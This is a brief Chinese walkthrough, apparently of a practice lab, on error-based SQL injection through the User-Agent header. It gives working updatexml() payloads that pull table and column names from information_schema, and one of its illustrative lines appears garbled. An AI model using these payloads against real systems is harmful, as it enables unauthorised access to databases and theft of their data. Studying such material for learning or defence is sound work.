输入正确的账号和密码后出现UA头,可以判断注入点在User-Agent请求头中
随便输入一个’引号出现以下报错
由此判断很有可能是一个报错注入,语句可能是INSERT INTO table VALUE (contains)语句这里闭合了前面的’写入一个or语句
根据报错信息猜测它的语句可能是VALUES(‘$value1’,‘$value2’,‘$value3’)
这里咱们闭合$VALUE1前面的引号,当然后面的引号也需要闭合,最后构造
or 报错语句> or
拼接到sql语句中就是
VALUES(''or or'', '\$value2', '$value3')
爆出库名,接下来就是爆表名
' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) or '
爆出字段,这里没有显示完全,使用mid()函数
' or updatexml(1,concat(0x7e,(mid((select group_concat(column_name) from information_schema.columns where table_name='users'),1,31)),0x7e),1) or '